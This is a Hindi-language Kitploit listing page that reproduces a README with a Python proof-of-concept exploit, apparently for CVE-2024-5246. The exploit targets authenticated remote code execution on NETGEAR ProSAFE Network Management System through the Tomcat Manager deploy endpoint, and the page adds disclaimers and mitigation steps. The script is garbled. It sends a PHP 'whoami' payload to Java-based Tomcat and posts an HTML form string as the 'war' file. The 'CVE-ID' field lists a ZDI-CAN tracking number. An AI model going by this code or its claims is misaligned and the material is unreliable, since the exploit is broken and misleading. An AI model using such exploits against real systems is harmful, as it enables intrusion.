Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/abdurahmon3236/cve-2024-5246
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubabdurahmon3236/cve-2024-5246

CVE-2024-5246

NETGEAR ProSAFE नेटवर्क प्रबंधन प्रणाली में एक दुर्भावनापूर्ण वेब एप्लिकेशन तैनात करके कमजोर Apache Tomcat के माध्यम से प्रमाणित दूरस्थ कोड निष्पादन का प्रदर्शन करने वाली प्रूफ-ऑफ-कॉन्सेप्ट Python स्क्रिप्ट।

रिपॉजिटरी देखें
222 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

यहाँ NETGEAR ProSAFE नेटवर्क प्रबंधन प्रणाली में रिमोट कोड निष्पादन (RCE) भेद्यता के लिए एक संरचित README.md प्रस्तुत है:


NETGEAR ProSAFE नेटवर्क प्रबंधन प्रणाली में रिमोट कोड निष्पादन (RCE) के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC)

इस रिपॉजिटरी में NETGEAR ProSAFE नेटवर्क प्रबंधन प्रणाली में एक रिमोट कोड निष्पादन (RCE) भेद्यता प्रदर्शित करने वाली एक प्रूफ ऑफ कॉन्सेप्ट (PoC) स्क्रिप्ट शामिल है। यह भेद्यता उत्पाद इंस्टॉलर के भीतर Apache Tomcat के एक कमजोर संस्करण के उपयोग के कारण है। यह समस्या प्रमाणित हमलावरों को प्रभावित इंस्टॉलेशन पर मनमाना कोड निष्पादित करने की अनुमति देती है।

भेद्यता विवरण

CVE-ID: ZDI-CAN-22868

अवलोकन: NETGEAR ProSAFE नेटवर्क प्रबंधन प्रणाली में Apache Tomcat के एक कमजोर संस्करण के उपयोग के कारण रिमोट कोड निष्पादन भेद्यता है। एक प्रमाणित हमलावर इस भेद्यता का उपयोग करके प्रभावित सिस्टम पर SYSTEM के संदर्भ में मनमाना कोड निष्पादित कर सकता है।

प्रभावित संस्करण:

  • NETGEAR ProSAFE नेटवर्क प्रबंधन प्रणाली के संस्करण जिनमें कमजोर Apache Tomcat संस्करण शामिल हैं।

प्रमाणीकरण: आवश्यक

PoC विवरण

यह PoC दर्शाता है कि कैसे एक हमलावर रिमोट कोड निष्पादन प्राप्त करने के लिए भेद्यता का शोषण कर सकता है। विशिष्ट दोष उत्पाद इंस्टॉलर में निहित है, जो Apache Tomcat के पुराने या कमजोर संस्करण के उपयोग के कारण है।

PoC स्क्रिप्ट

निम्नलिखित स्क्रिप्ट दिखाती है कि इस RCE भेद्यता का शोषण कैसे करें। इस PoC को चलाने से पहले सुनिश्चित करें कि आपके पास उचित अनुमतियाँ हैं।

महत्वपूर्ण: यह PoC केवल शैक्षिक उद्देश्यों के लिए है और इसका उपयोग अनधिकृत या दुर्भावनापूर्ण गतिविधियों के लिए नहीं किया जाना चाहिए।

import requests

# Configuration
target_url = "http://target-ip:port/manager/html"  # Change this to the Tomcat Manager URL of the target
username = "admin"  # Change to the valid username
password = "password"  # Change to the valid password

# The payload to be executed on the remote server
payload = """
<?php
    // Payload to execute arbitrary PHP code
    system('whoami');
?>
"""

# Tomcat Manager URL path for deploying a new web application
deploy_url = f"{target_url}/deploy?path=/example&update=true"

# Headers for authentication
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

def exploit_rce(url, username, password, payload):
    """
    Exploit the RCE vulnerability by deploying a malicious web application.

    Args:
        url (str): The Tomcat Manager URL.
        username (str): The Tomcat Manager username.
        password (str): The Tomcat Manager password.
        payload (str): The malicious payload to be executed.
    """
    try:
        # Create a new web application with the malicious payload
        response = requests.post(
            url,
            headers=headers,
            data={
                "path": "/example",
                "war": f"<form method='post' enctype='multipart/form-data'><input type='file' name='file' value='{payload}'/></form>"
            },
            auth=(username, password)
        )
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.text)
        
        if response.status_code == 200 and "Deployed application" in response.text:
            print("[+] Successfully deployed the malicious web application.")
        else:
            print("[-] Failed to deploy the malicious web application.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    print(f"Exploiting RCE vulnerability at: {deploy_url}")
    exploit_rce(deploy_url, username, password, payload)

स्पष्टीकरण

  1. कॉन्फ़िगरेशन: target_url को लक्ष्य सिस्टम के Tomcat Manager URL पर सेट करें, और username और password को वैध क्रेडेंशियल्स से अपडेट करें।
  2. पेलोड: पेलोड एक सरल PHP स्क्रिप्ट है जो कोड निष्पादन प्रदर्शित करने के लिए एक सिस्टम कमांड निष्पादित करती है।
  3. एक्सप्लॉइट फ़ंक्शन: exploit_rce() फ़ंक्शन दुर्भावनापूर्ण वेब एप्लिकेशन को तैनात करने के लिए एक POST अनुरोध भेजता है।
  4. तैनाती: स्क्रिप्ट दुर्भावनापूर्ण पेलोड के साथ एक नया वेब एप्लिकेशन तैनात करने का प्रयास करती है और परिणाम प्रिंट करती है।

महत्वपूर्ण विचार

  • अनुमतियाँ: सुनिश्चित करें कि आपके पास लक्ष्य सिस्टम पर इस भेद्यता का परीक्षण करने की स्पष्ट अनुमति है। अनधिकृत परीक्षण अवैध और अनैतिक है।
  • परीक्षण वातावरण: उत्पादन प्रणालियों को प्रभावित करने से बचने के लिए नियंत्रित वातावरण में परीक्षण करें।
  • नैतिक उपयोग: इस PoC का जिम्मेदारी से और केवल अधिकृत संदर्भों में उपयोग करें।

शमन

इस भेद्यता को कम करने के लिए, निम्नलिखित कदम उठाएँ:

  1. Tomcat अपडेट करें: Apache Tomcat के उस संस्करण में अपग्रेड करें जिसने भेद्यता को पैच किया हो।
  2. एक्सेस सुरक्षित करें: सुनिश्चित करें कि Tomcat Manager और अन्य संवेदनशील इंटरफ़ेस सुरक्षित हैं और केवल अधिकृत उपयोगकर्ताओं के लिए सुलभ हैं।
  3. कॉन्फ़िगरेशन की समीक्षा करें: नियमित रूप से वेब एप्लिकेशन और सर्वर के कॉन्फ़िगरेशन की समीक्षा और सख्त करें।

इन चरणों का पालन करके, आप NETGEAR ProSAFE नेटवर्क प्रबंधन प्रणाली में RCE भेद्यता को संबोधित कर सकते हैं और समग्र सुरक्षा बढ़ा सकते हैं।


यह README.md RCE भेद्यता के लिए एक विस्तृत विवरण और PoC स्क्रिप्ट प्रदान करता है, जिसमें सेटअप निर्देश, विचार और शमन सलाह शामिल है।

टूल डाउनलोड करें